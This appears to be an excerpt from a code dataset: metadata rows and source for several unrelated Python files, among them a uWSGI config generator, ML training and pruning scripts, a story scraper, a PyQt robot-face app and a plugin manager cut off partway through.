0
0
1
bd910c797a7c02460f8f88af118cb92f19b632c2
1,857
py
Python
generate_30000.py
mikamai/uwsgi.it
d2f11ae850efda43532454ab70aa50540df0011b
[ "MIT" ]
null
null
null
generate_30000.py
mikamai/uwsgi.it
d2f11ae850efda43532454ab70aa50540df0011b
[ "MIT" ]
null
null
null
generate_30000.py
mikamai/uwsgi.it
d2f11ae850efda43532454ab70aa50540df0011b
[ "MIT" ]
null
null
null
from django.conf import settings from django.template.loader import render_to_string import ConfigParser from collections import OrderedDict import sys from Crypto.PublicKey import RSA class AllowsSameKeys(OrderedDict): def __setitem__(self, key, value): if isinstance(value, list) and key in self: self[key].extend(value) else: super(OrderedDict, self).__setitem__(key, value) c = ConfigParser.ConfigParser(dict_type=AllowsSameKeys) c.readfp(open(sys.argv[1])) # django snippet 646, raise an Exception missing var class InvalidVarException(object): def __mod__(self, missing): try: missing_str=unicode(missing) except: missing_str='Failed to create string representation' raise Exception('Unknown template variable %r %s' % (missing, missing_str)) def __contains__(self, search): if search=='%s': return True return False settings.configure(TEMPLATE_DIRS=('uwsgi_it_api/templates',), TEMPLATE_STRING_IF_INVALID=InvalidVarException()) rsa_key = RSA.generate(2048).exportKey() container = { 'name': '30000', 'hostname': c.get('uwsgi','api_domain')[0].replace('.','-'), 'uid': 30000, 'ip': '10.0.0.2', 'server': { 'hd':c.get('uwsgi','api_hd')[0], 'etc_resolv_conf_lines': c.get('uwsgi','api_resolvconf'), 'etc_hosts_lines': c.get('uwsgi','api_hosts'), }, 'quota': 20 * 1024 * 1024 * 1024, 'memory_limit_in_bytes': 1024 * 1024 * 1024, 'distro': {'path': 'precise'}, 'quota_threshold': 90, 'ssh_keys': c.get('uwsgi','api_ssh_key'), 'customer': { 'rsa_key_lines': rsa_key.split('\n'), 'rsa_pubkey_lines': RSA.importKey(rsa_key).publickey().exportKey().split('\n'), }, } print render_to_string('vassal.ini', {'container': container})
32.578947
111
0.653204
229
1,857
5.065502
0.502183
0.017241
0.038793
0.051724
0.02931
0
0
0
0
0
0
0.035594
0.198169
1,857
56
112
33.160714
0.743452
0.026925
0
0
0
0
0.204986
0.035457
0
0
0
0
0
0
null
null
0
0.145833
null
null
0.020833
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
bd91ba13b85667cd92a61109fae15aca6df3f93b
3,561
py
Python
LoveDA/uda/baseline_train.py
edornd/ProDA
ffb092afbbde95e4ca29cb1ec199f9685f6601fb
[ "MIT" ]
null
null
null
LoveDA/uda/baseline_train.py
edornd/ProDA
ffb092afbbde95e4ca29cb1ec199f9685f6601fb
[ "MIT" ]
null
null
null
LoveDA/uda/baseline_train.py
edornd/ProDA
ffb092afbbde95e4ca29cb1ec199f9685f6601fb
[ "MIT" ]
null
null
null
import argparse import os import os.path as osp import torch import torch.nn as nn import torch.optim as optim from eval import evaluate from ever.core.iterator import Iterator from module.deeplabv2 import Deeplab from torch.nn import functional as fn from tqdm import tqdm from data.loveda import LoveDALoader from utils.tools import ( adjust_learning_rate, count_model_parameters, get_console_file_logger, import_config, loss_calc, seed_torch, ) parser = argparse.ArgumentParser(description='Run Baseline methods.') parser.add_argument('--config_path', type=str, help='config path') args = parser.parse_args() cfg = import_config(args.config_path) def main(): """Create the model and start the training.""" os.makedirs(cfg.SNAPSHOT_DIR, exist_ok=True) logger = get_console_file_logger(name='Deeplabv2', logdir=cfg.SNAPSHOT_DIR) # Create Network model = Deeplab(nn.BatchNorm2d, num_classes=7) # model = Deeplabv2( # dict( # backbone=dict( # resnet_type='resnet50', # output_stride=16, # pretrained=True, # ), # multi_layer=False, # cascade=False, # use_ppm=False, # ppm=dict( # num_classes=7, # use_aux=False, # norm_layer=nn.BatchNorm2d, # ), # inchannels=2048, # num_classes=7)) model.train() model.cuda() #cudnn.enabled = True #cudnn.benchmark = True logger.info('exp = %s' % cfg.SNAPSHOT_DIR) count_model_parameters(model, logger) trainloader = LoveDALoader(cfg.SOURCE_DATA_CONFIG) epochs = cfg.NUM_STEPS_STOP / len(trainloader) logger.info('epochs ~= %.3f' % epochs) trainloader_iter = Iterator(trainloader) optimizer = optim.SGD( model.parameters(), lr=cfg.LEARNING_RATE, momentum=cfg.MOMENTUM, weight_decay=cfg.WEIGHT_DECAY) # model, optimizer = amp.initialize(model, optimizer, opt_level="O1") optimizer.zero_grad() for i_iter in tqdm(range(cfg.NUM_STEPS_STOP)): optimizer.zero_grad() lr = adjust_learning_rate(optimizer, i_iter, cfg) # Train with Source batch = trainloader_iter.next() images_s, labels_s = batch[0] pred_source = model(images_s.cuda()) # pred_source is a dict with 
features and actual output pred_source = pred_source["out"] pred_source = fn.interpolate(pred_source, labels_s["cls"].size()[1:], mode="bilinear", align_corners=True) #Segmentation Loss loss = loss_calc(pred_source, labels_s['cls'].cuda()) loss.backward() optimizer.step() if i_iter % 50 == 0: logger.info('exp = {}'.format(cfg.SNAPSHOT_DIR)) text = 'iter = %d, loss_seg = %.3f, lr = %.3f' % (i_iter, loss, lr) logger.info(text) if i_iter >= cfg.NUM_STEPS_STOP - 1: print('save model ...') ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(cfg.NUM_STEPS_STOP) + '.pth') torch.save(model.state_dict(), ckpt_path) evaluate(model, cfg, True, ckpt_path, logger) break if i_iter % cfg.EVAL_EVERY == 0 and i_iter != 0: ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(i_iter) + '.pth') torch.save(model.state_dict(), ckpt_path) evaluate(model, cfg, True, ckpt_path, logger) model.train() if __name__ == '__main__': seed_torch(2333) main()
33.914286
114
0.627352
450
3,561
4.744444
0.366667
0.018735
0.039344
0.028103
0.123653
0.104918
0.104918
0.104918
0.104918
0.104918
0
0.012126
0.258916
3,561
104
115
34.240385
0.796893
0.184499
0
0.117647
0
0
0.058435
0
0
0
0
0
0
1
0.014706
false
0
0.220588
0
0.235294
0.014706
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd964ac6777bf26c9cd2e0c8102f286788f8ac58
201
py
Python
lab/db/utils.py
ParanoiaSYT/Qulab-backup
09ec5457145b3789d4c1ac02c43dd3e6dfafc96f
[ "MIT" ]
null
null
null
lab/db/utils.py
ParanoiaSYT/Qulab-backup
09ec5457145b3789d4c1ac02c43dd3e6dfafc96f
[ "MIT" ]
null
null
null
lab/db/utils.py
ParanoiaSYT/Qulab-backup
09ec5457145b3789d4c1ac02c43dd3e6dfafc96f
[ "MIT" ]
null
null
null
import os def beforeSaveFile(fname): '''makesure the path exists before save file''' dirname = os.path.dirname(fname) if not os.path.exists(dirname): os.makedirs(dirname)
22.333333
52
0.651741
26
201
5.038462
0.615385
0.152672
0
0
0
0
0
0
0
0
0
0
0.238806
201
8
53
25.125
0.856209
0.20398
0
0
0
0
0
0
0
0
0
0
0
1
0.2
false
0
0.2
0
0.4
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
bd979067fb3d0b6a4ab0071970a4c14f2b400d8d
1,478
py
Python
terra/estimators/migrations/0001_initial.py
dymaxionlabs/platform
98fe893d4632d62fea3e2357f16d970014037cdf
[ "BSD-3-Clause" ]
null
null
null
terra/estimators/migrations/0001_initial.py
dymaxionlabs/platform
98fe893d4632d62fea3e2357f16d970014037cdf
[ "BSD-3-Clause" ]
null
null
null
terra/estimators/migrations/0001_initial.py
dymaxionlabs/platform
98fe893d4632d62fea3e2357f16d970014037cdf
[ "BSD-3-Clause" ]
null
null
null
# Generated by Django 2.2 on 2019-04-22 13:45 import django.contrib.postgres.fields.jsonb from django.db import migrations, models import django.db.models.deletion import uuid class Migration(migrations.Migration): initial = True dependencies = [ ('projects', '0030_allow_null_in_projects_groups_and_layers_file'), ] operations = [ migrations.CreateModel( name='Estimator', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('uuid', models.UUIDField(default=uuid.uuid4, editable=False, unique=True)), ('estimator_type', models.CharField(choices=[('OD', 'Object detection')], default='OD', max_length=2, verbose_name='estimator type')), ('name', models.CharField(max_length=255, verbose_name='name')), ('metadata', django.contrib.postgres.fields.jsonb.JSONField(blank=True, null=True)), ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='created at')), ('updated_at', models.DateTimeField(auto_now=True, verbose_name='updated at')), ('project', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='projects.Project', verbose_name='project')), ], options={ 'unique_together': {('project', 'estimator_type', 'name')}, }, ), ]
42.228571
150
0.631258
162
1,478
5.592593
0.475309
0.072848
0.046358
0.059603
0.13245
0
0
0
0
0
0
0.020122
0.226658
1,478
34
151
43.470588
0.772528
0.029093
0
0
1
0
0.173761
0.034892
0
0
0
0
0
1
0
false
0
0.148148
0
0.296296
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
bd97ac57a2038b6973c0d833aeb1a199dd43dec5
1,607
py
Python
d16/p1.py
Jamie-Chang/advent2019
130ccdc2a320d0a8d926a781a41fd74389e403a9
[ "Apache-2.0" ]
null
null
null
d16/p1.py
Jamie-Chang/advent2019
130ccdc2a320d0a8d926a781a41fd74389e403a9
[ "Apache-2.0" ]
null
null
null
d16/p1.py
Jamie-Chang/advent2019
130ccdc2a320d0a8d926a781a41fd74389e403a9
[ "Apache-2.0" ]
null
null
null
from pathlib import Path from typing import Callable, Iterable, Iterator, List from itertools import chain, cycle, islice, repeat import numpy as np BASE_PATTERN = [0, 1, 0, -1] def read_lines() -> Iterator[str]: with (Path(__file__).parent / "input.txt").open("r") as f: for line in f: yield line.rstrip() def get_inputs() -> Iterator[int]: line = list(read_lines())[0] for i in line: yield int(i) def repeat_each(pattern, repeats: int): return chain(*map(lambda i: repeat(i, repeats), pattern)) def generate_pattern(base: Iterable[int], repeats: int, length: int) -> Iterator[int]: """Generate the pattern as specified by the algorithm. Example: >>> list(generate_pattern([0, 1, 0, -1], 2, 15)) [0, 1, 1, 0, 0, -1, -1, 0, 0, 1, 1, 0, 0, -1, -1] """ return islice(cycle(repeat_each(base, repeats)), 1, length + 1) def create_filter_matrix(length: int) -> np.array: return np.array( [list(generate_pattern(BASE_PATTERN, i + 1, length)) for i in range(length)] ) def create_input_vector() -> np.array: return np.array(list(get_inputs())) def create_last_digit_filter() -> Callable: return np.vectorize(lambda i: abs(i) % 10) def perform_fft(iterations: int) -> np.array: vector = create_input_vector() filter_matrix = create_filter_matrix(len(vector)) last_digit_filter = create_last_digit_filter() for _ in range(iterations): vector = last_digit_filter(filter_matrix @ vector) return vector # print(list(generate_pattern(2, 10))) print(perform_fft(100)[:8])
26.344262
86
0.657747
236
1,607
4.313559
0.313559
0.015717
0.011788
0.011788
0.083497
0.061886
0.014735
0.014735
0.014735
0.014735
0
0.030445
0.202862
1,607
61
87
26.344262
0.764247
0.128189
0
0
0
0
0.007252
0
0
0
0
0
0
1
0.242424
false
0
0.121212
0.121212
0.545455
0.030303
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
bd98c615b517218be23b4c4fa061f1bb81f35762
925
py
Python
1_extract_story.py
varsh6/weekcode
4e5eb0ff0bd8af5b2fed24faeed50733c4a00551
[ "MIT" ]
2
2015-03-25T18:05:50.000Z
2016-05-05T09:49:45.000Z
1_extract_story.py
varsh6/weekcode
4e5eb0ff0bd8af5b2fed24faeed50733c4a00551
[ "MIT" ]
null
null
null
1_extract_story.py
varsh6/weekcode
4e5eb0ff0bd8af5b2fed24faeed50733c4a00551
[ "MIT" ]
null
null
null
from bs4 import BeautifulSoup import urllib2 start_url="https://www.fictionpress.com/s/2780124/1/Rise-From-The-Ashes-OLD" #start url end =False split_url=start_url.split("/") new_url="" for i in range(5): new_url=new_url+split_url[i]+"/" i=1 while not (end): url=new_url+"/"+str(i)+"/" i=i+1 response=urllib2.urlopen(url) html_text=response.read() response.close() foo=open("fiction.txt","a")##File path where you want to save this file soup=BeautifulSoup(html_text) raw_story = soup.select("div > #storytext > p ") if raw_story: title = raw_story[0].get_text() print title for line in raw_story: foo.write(line.get_text().encode('utf-8')+"\n") foo.write("\n ----><-----\n\n\n") else: print "<--the end-->" end=True foo.write("\n------------~~~~~~~~~--------------") foo.close()
21.511628
87
0.566486
133
925
3.819549
0.518797
0.047244
0.035433
0
0
0
0
0
0
0
0
0.02244
0.229189
925
42
88
22.02381
0.690042
0.055135
0
0
0
0.034483
0.204833
0.042578
0
0
0
0
0
0
null
null
0
0.068966
null
null
0.068966
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
bd9906411d0902be3e6498e5a1a56da473448736
2,161
py
Python
tests/tensorflow/pruning/test_flops_pruning.py
sarthakpati/nncf
29ad62c664c1dd53b3c8c50fc001a1b36bd1e8ac
[ "Apache-2.0" ]
1
2021-12-30T05:49:10.000Z
2021-12-30T05:49:10.000Z
tests/tensorflow/pruning/test_flops_pruning.py
sarthakpati/nncf
29ad62c664c1dd53b3c8c50fc001a1b36bd1e8ac
[ "Apache-2.0" ]
1
2021-07-23T07:46:52.000Z
2021-07-23T07:46:52.000Z
tests/tensorflow/pruning/test_flops_pruning.py
sarthakpati/nncf
29ad62c664c1dd53b3c8c50fc001a1b36bd1e8ac
[ "Apache-2.0" ]
null
null
null
""" Copyright (c) 2021 Intel Corporation Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import pytest from tests.tensorflow.helpers import create_compressed_model_and_algo_for_test from tests.tensorflow.pruning.helpers import get_basic_pruning_config from tests.tensorflow.pruning.helpers import get_test_model_shared_convs @pytest.mark.parametrize( ("model", "all_weights", "ref_full_flops", "ref_current_flops", "ref_full_params", "ref_current_params"), ( (get_test_model_shared_convs, True, 461438976, 276385312, 11534848, 6908711), (get_test_model_shared_convs, False, 461438976, 270498816, 11534848, 6761608) ) ) def test_flops_calulation_for_spec_layers(model, all_weights, ref_full_flops, ref_current_flops, ref_full_params, ref_current_params): config = get_basic_pruning_config(8) config['compression']['algorithm'] = 'filter_pruning' config['compression']['pruning_init'] = 0.4 config['compression']['params']['pruning_flops_target'] = 0.4 config['compression']['params']['prune_first_conv'] = True config['compression']['params']['prune_last_conv'] = True config['compression']['params']['all_weights'] = all_weights input_shape = [1, 8, 8, 1] model = model(input_shape) model.compile() _, compression_ctrl = create_compressed_model_and_algo_for_test(model, config) assert compression_ctrl.full_flops == ref_full_flops assert compression_ctrl.full_params_num == ref_full_params assert compression_ctrl.current_flops == ref_current_flops assert compression_ctrl.current_params_num == ref_current_params
44.102041
96
0.745951
289
2,161
5.283737
0.415225
0.039293
0.060249
0.035363
0.310413
0.193844
0.193844
0.092993
0.092993
0.092993
0
0.045907
0.16335
2,161
48
97
45.020833
0.798673
0.258677
0
0
0
0
0.168561
0
0
0
0
0
0.129032
1
0.032258
false
0
0.129032
0
0.16129
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd99509849b2119597bc329227a6d9a8957453fc
61
py
Python
text/_geometry/boxing/_line/__init__.py
jedhsu/text
8525b602d304ac571a629104c48703443244545c
[ "Apache-2.0" ]
null
null
null
text/_geometry/boxing/_line/__init__.py
jedhsu/text
8525b602d304ac571a629104c48703443244545c
[ "Apache-2.0" ]
null
null
null
text/_geometry/boxing/_line/__init__.py
jedhsu/text
8525b602d304ac571a629104c48703443244545c
[ "Apache-2.0" ]
null
null
null
from .style import LineStyle __all__ = [ "LineStyle", ]
10.166667
28
0.655738
6
61
6
0.833333
0
0
0
0
0
0
0
0
0
0
0
0.229508
61
5
29
12.2
0.765957
0
0
0
0
0
0.147541
0
0
0
0
0
0
1
0
false
0
0.25
0
0.25
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
bd99e09ac29cee3774d16f59b6db9c324075e704
9,812
py
Python
HCI/emotions.py
shinkansan/2019-UGRP-DPoom
eedee93b47e068f22bf420140d869a43f7551876
[ "Apache-2.0" ]
33
2020-07-16T06:31:38.000Z
2022-03-23T18:34:58.000Z
HCI/emotions.py
shinkansan/2019-UGRP-DPoom
eedee93b47e068f22bf420140d869a43f7551876
[ "Apache-2.0" ]
5
2020-08-27T08:06:21.000Z
2022-02-23T12:34:09.000Z
HCI/emotions.py
shinkansan/2019-UGRP-DPoom
eedee93b47e068f22bf420140d869a43f7551876
[ "Apache-2.0" ]
10
2020-08-05T15:05:58.000Z
2021-11-19T10:20:44.000Z
""" Dpoom Face Expression Windows 2019 """ from PyQt5.QtCore import * from PyQt5.QtWidgets import * from PyQt5.QtGui import * from PyQt5.QtWebEngineWidgets import * from PyQt5.QtPrintSupport import * import fall_body_1013 as fall_body import os import sys import numpy as np import argparse import imutils import time import cv2 import os import pyrealsense2 as rs import threading import matplotlib.pyplot as plt import uuid import queue specificSet = [ '/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python36.zip', '/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python3.6', '/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python3.6/lib-dynload', '/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python3.6/site-packages'] #sys.path = specificSet MainIndex = "file:///home/dpoom2/dpoom_few/index.html" class AboutDialog(QDialog): def __init__(self, *args, **kwargs): super(AboutDialog, self).__init__(*args, **kwargs) QBtn = QDialogButtonBox.Ok # No cancel self.buttonBox = QDialogButtonBox(QBtn) self.buttonBox.accepted.connect(self.accept) self.buttonBox.rejected.connect(self.reject) layout = QVBoxLayout() title = QLabel("DPoom FEW") font = title.font() font.setPointSize(20) title.setFont(font) layout.addWidget(title) layout.addWidget(QLabel("Version 1")) layout.addWidget(QLabel("Copyright TEAM DPOOM.")) for i in range(0, layout.count()): layout.itemAt(i).setAlignment(Qt.AlignHCenter) layout.addWidget(self.buttonBox) self.setLayout(layout) class MainWindow(QMainWindow): thread_signal = pyqtSignal() send_instances_signal = pyqtSignal("PyQt_PyObject") def __init__(self, *args, **kwargs): super(MainWindow, self).__init__(*args, **kwargs) self.status_emeregency = False self.browser = QWebEngineView() self.browser.setUrl(QUrl(MainIndex)) self.browser.urlChanged.connect(self.update_urlbar) self.browser.loadFinished.connect(self.update_title) self.browser.loadFinished.connect(self.setDefaultExpr) self.setCentralWidget(self.browser) self.status = QStatusBar() self.setStatusBar(self.status) 
navtb = QToolBar("Navigation") navtb.setIconSize(QSize(16, 16)) #self.addToolBar(navtb) back_btn = QAction("Back", self) back_btn.setStatusTip("Back to previous page") back_btn.triggered.connect(self.browser.back) navtb.addAction(back_btn) next_btn = QAction(QIcon(os.path.join('images', 'arrow-000.png')), "Forward", self) next_btn.setStatusTip("Forward to next page") next_btn.triggered.connect(self.browser.forward) navtb.addAction(next_btn) reload_btn = QAction(QIcon(os.path.join('images', 'arrow-circle-315.png')), "Reload", self) reload_btn.setStatusTip("Reload page") reload_btn.triggered.connect(self.browser.reload) navtb.addAction(reload_btn) home_btn = QAction(QIcon(os.path.join('images', 'home.png')), "Home", self) home_btn.setStatusTip("Go home") home_btn.triggered.connect(self.navigate_home) navtb.addAction(home_btn) navtb.addSeparator() self.urlbar = QLineEdit() self.urlbar.returnPressed.connect(self.navigate_to_url) navtb.addWidget(self.urlbar) stop_btn = QAction( "Stop", self) stop_btn.setStatusTip("Stop loading current page") stop_btn.triggered.connect(self.browser.stop) navtb.addAction(stop_btn) # Uncomment to disable native menubar on Mac # self.menuBar().setNativeMenuBar(False) file_menu = self.menuBar().addMenu("&File") open_file_action = QAction( "Open file...", self) open_file_action.setStatusTip("Open from file") open_file_action.triggered.connect(self.open_file) file_menu.addAction(open_file_action) # save_file_action = QAction(QIcon(os.path.join('images', 'disk--pencil.png')), "Save Page As...", self) # save_file_action.setStatusTip("Save current page to file") # save_file_action.triggered.connect(self.save_file) # file_menu.addAction(save_file_action) # print_action = QAction(QIcon(os.path.join('images', 'printer.png')), "Print...", self) # print_action.setStatusTip("Print current page") # print_action.triggered.connect(self.print_page) #file_menu.addAction(print_action) about_action = QAction("Specif Setting", self) 
about_action.setStatusTip("detail") # Hungry! about_action.triggered.connect(self.about) file_menu.addAction(about_action) navigate_mozarella_action = QAction("Go Homepage", self) navigate_mozarella_action.setStatusTip("Go to Dpoom home") navigate_mozarella_action.triggered.connect(self.navigate_mozarella) file_menu.addAction(navigate_mozarella_action) self.showFullScreen() self.show() self.th = Worker(parent=self) self.th.start() self.th2 = YoloWorker(parent=self) self.th2.start() self.setWindowIcon(QIcon(os.path.join('images', 'ma-icon-64.png'))) def setDefaultExpr(self): self.browser.page().runJavaScript("eyes.startBlinking()") print('set default expr') def setExpr(self, classN): emoClass = { 0:"eyes.startBlinking()", 1:"eyes.stopBlinking()", 2:"eyes.blink()", 3:"eyes.express({type: 'happy'})", 4:"eyes.express({type: 'sad'})", 5:"eyes.express({type: 'angry'})", 6:"eyes.express({type: 'focused'})", 7:"eyes.express({type: 'confused'})" } self.browser.page().runJavaScript(emoClass.get(classN)) pass def declareEmergency(self): self.status_emeregency = not self.status_emeregency if self.status_emeregency: self.browser.page().runJavaScript('clearInterval(light)') self.browser.page().runJavaScript('var light = setInterval("lightning()",360);') else: self.browser.page().runJavaScript('clearInterval(light)') self.browser.page().runJavaScript('var light = setInterval("getBackwhite()",360);') def update_title(self): title = self.browser.page().title() self.setWindowTitle("Dpoom FEW") def navigate_mozarella(self): self.browser.setUrl(MainIndex) def about(self): dlg = AboutDialog() dlg.exec_() def open_file(self): filename, _ = QFileDialog.getOpenFileName(self, "Open file", "", "Hypertext Markup Language (*.htm *.html);;" "All files (*.*)") if filename: with open(filename, 'r') as f: html = f.read() self.browser.setHtml(html) self.urlbar.setText(filename) def save_file(self): filename, _ = QFileDialog.getSaveFileName(self, "Save Page As", "", "Hypertext Markup Language 
(*.htm *html);;" "All files (*.*)") if filename: html = self.browser.page().toHtml() with open(filename, 'w') as f: f.write(html) def print_page(self): dlg = QPrintPreviewDialog() dlg.paintRequested.connect(self.browser.print_) dlg.exec_() def navigate_home(self): self.browser.setUrl(QUrl("")) def navigate_to_url(self): # Does not receive the Url q = QUrl(self.urlbar.text()) if q.scheme() == "": q.setScheme("http") self.browser.setUrl(q) def update_urlbar(self, q): if q.scheme() == 'https': # Secure padlock icon pass else: # Insecure padlock icon pass #self.urlbar.setText(q.toString()) #self.urlbar.setCursorPosition(0) class Worker(QThread): #sec_changed = pyqtSignal(str) def __init__(self, sec=0, parent=None): super(Worker, self).__init__() self.main = parent self.working = True self.sec = sec # self.main.add_sec_signal.connect(self.add_sec) # custom signal from main thread to worker thread def __del__(self): print(".... end thread.....") self.wait() def defaultAction(self): while(True): if fall_body.fallFlag: print("fall body detected!!!!!!!") elif fall_body.humanFlag: print("human detected !!!") ###cascade_1013 emoNumber= int(np.random.uniform(3, 8)) try: emoNumber = int(emoNumber) except: pass #window.about() else: window.setExpr(int(emoNumber)) time.sleep(3) print('active') def run(self): self.defaultAction(); class YoloWorker(QThread): def __init__(self, parent=None): super(YoloWorker, self).__init__() self.main = parent self.working = True def __del__(self): print('yolo thread dead') self.wait() def yolo_main(self): print('yolo thread working') if self.working: self.working = not self.working fall_body.main(verbose=0) def run(self): self.yolo_main() app = QApplication(sys.argv) app.setApplicationName("Dpoom FEW") app.setOrganizationName("Dpoom FEW") app.setOrganizationDomain("github.com/shinkansan") window = MainWindow() app.exec_()
30.190769
112
0.614248
1,078
9,812
5.457328
0.288497
0.043005
0.033996
0.015298
0.174061
0.128336
0.113038
0.096209
0.047935
0.031617
0
0.009662
0.261618
9,812
324
113
30.283951
0.802346
0.094884
0
0.134259
0
0
0.143987
0.04193
0
0
0
0
0
1
0.101852
false
0.018519
0.087963
0
0.217593
0.041667
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bd9a1dd2de3b7a992cf45cfd0f9ad879ed786bb2
16,444
py
Python
src/sentry/plugins/base/manager.py
commonlims/commonlims
36a02ed244c7b59ee1f2523e64e4749e404ab0f7
[ "BSD-3-Clause" ]
4
2019-05-27T13:55:07.000Z
2021-03-30T07:05:09.000Z
src/sentry/plugins/base/manager.py
commonlims/commonlims
36a02ed244c7b59ee1f2523e64e4749e404ab0f7
[ "BSD-3-Clause" ]
99
2019-05-20T14:16:33.000Z
2021-01-19T09:25:15.000Z
src/sentry/plugins/base/manager.py
commonlims/commonlims
36a02ed244c7b59ee1f2523e64e4749e404ab0f7
[ "BSD-3-Clause" ]
1
2020-08-10T07:55:40.000Z
2020-08-10T07:55:40.000Z
""" sentry.plugins.base.manager ~~~~~~~~~~~~~~~~~~~~~~~~~~~ :copyright: (c) 2010-2013 by the Sentry Team, see AUTHORS for more details. :license: BSD, see LICENSE for more details. """ from __future__ import absolute_import, print_function __all__ = ('PluginManager', ) import sys import os import six import logging import click import importlib from clims.handlers import HandlerManager from sentry.utils.managers import InstanceManager from sentry.utils.safe import safe_execute from django.conf import settings from django.db import transaction from django.db.utils import ProgrammingError logger = logging.getLogger(__name__) class PluginManager(object): """ Handles plugins. Plugins need to be installed via a call to `lims upgrade`. This will install all plugins that are found in the application at the time. When a plugin is found in the environment, it's installed, i.e. added to the database. After that, it needs to exist on load time from there on. It's currently not supported to uninstall a plugin. When the application loads, it will load all plugins that exist in the database. """ def __init__(self, app, instance_manager=None): self._app = app self.handlers = HandlerManager(app) self.work_types = dict() # TODO: Add to a manager class self.instance_manager = instance_manager or InstanceManager() # Install (during upgrade) def auto_install(self): """ Installs all plugins that can be found in the Python environment. An entry for the plugin and version is created in the database. """ logger.info("Auto installing plugins found in environment") plugins = self.find_all_plugins_in_scope() self.install_plugins(*plugins) def install_plugins(self, *plugins): """ Installs the plugins in the backend. Plugins can not be loaded before they have been installed. 
""" for plugin in plugins: logger.info("Installing plugin class '{}'".format(plugin.get_name_and_version())) with transaction.atomic(): plugin_reg = self.install_plugin(plugin) self.install_extensible_types(plugin) self.install_workflows_in_plugin(plugin, plugin_reg) def install_workflows_in_plugin(self, plugin_cls, plugin_reg): """ Installs workflow definitions found in the plugin. """ logger.info("Loading workflows for plugin class {}".format(plugin_cls)) definitions = list(plugin_cls.get_process_definitions()) logger.info("Found {} workflow definitions for plugin class {}".format( len(definitions), plugin_cls)) for definition in definitions: self._app.workflows.install(definition, plugin_reg) def validate_version(self, plugin_cls): if not plugin_cls.version: raise PluginMustHaveVersion() # Ensure that we can parse the string as a sortable tuple: try: parsed = plugin_cls.get_sortable_version() logger.debug("Plugin {} has a valid version {} => {}".format( plugin_cls, plugin_cls.version, parsed)) except ValueError: raise PluginIncorrectVersionFormat( "Plugin versions must be a list of dot separated numbers, e.g. 1.0.0") def install_plugin(self, plugin_cls): """ Installs the plugin in the database. This method should be called when upgrading the system, so the end-user is in control of when a new model is available. Returns a plugin registration model that represents the installation. """ # Make sure we have a plugin registration here: from clims.models import PluginRegistration self.validate_version(plugin_cls) logger.debug("Recording plugin {} version={} in the database".format( plugin_cls.get_full_name(), plugin_cls.version)) reg, _ = PluginRegistration.objects.get_or_create( name=plugin_cls.get_full_name(), version=plugin_cls.version) return reg def install_extensible_types(self, plugin): """ Installs all the extensible types found in the plugin. These are for example specific Plates, Projects and Samples defined by the plugin developers. 
""" logger.info("Installing extensible types found in plugin class '{}'".format( plugin.get_name_and_version())) from clims.models import PluginRegistration plugin_model = PluginRegistration.objects.get(name=plugin.get_full_name(), version=plugin.version) for extensible_cls in plugin.get_extensible_objects(): self._app.extensibles.register(plugin_model, extensible_cls) def get_work_type(self, full_name): # TODO: Validate that this is a work type class if full_name not in self.work_types: cls = InstanceManager.find_cls(full_name) self.work_types[full_name] = cls return self.work_types[full_name] def get_extensible_types_from_db(self): """ :return: class objects of extensible types """ from clims.models.extensible import ExtensibleType extensible_types = ExtensibleType.objects.all() type_names_in_db = [e.name for e in extensible_types] for type_name in type_names_in_db: split_type_name = type_name.split('.') full_module_name = '.'.join(split_type_name[:-1]) extensible_class_name = split_type_name[-1] module = self._import_module(full_module_name) extensible_class = getattr(module, extensible_class_name, None) # NOTE: Silently returning nothing if the class wasn't loaded if extensible_class: yield extensible_class else: logger.warn("Not able to load registered extensible {}".format(type_name)) def find_plugins_by_entry_points(self): """ Returns plugins that have been marked as such by adding an entry like: entry_points={ 'clims.plugins': [ 'org_plugins = org_plugins.plugins:YourPlugin', ], }, to the setup.py file in the plugin package. """ # NOTE: Users must specify an entry_point in their setup.py so that plugins will # be discovered. # See e.g.: https://github.com/Molmed/commonlims-snpseq/blob/cd1c011a3/setup.py#L105 from pkg_resources import iter_entry_points entry_points = [ep for ep in iter_entry_points('clims.plugins')] for ep in entry_points: try: plugin = ep.load() yield plugin except Exception: # Handling all exceptions since the code is unknown to us. 
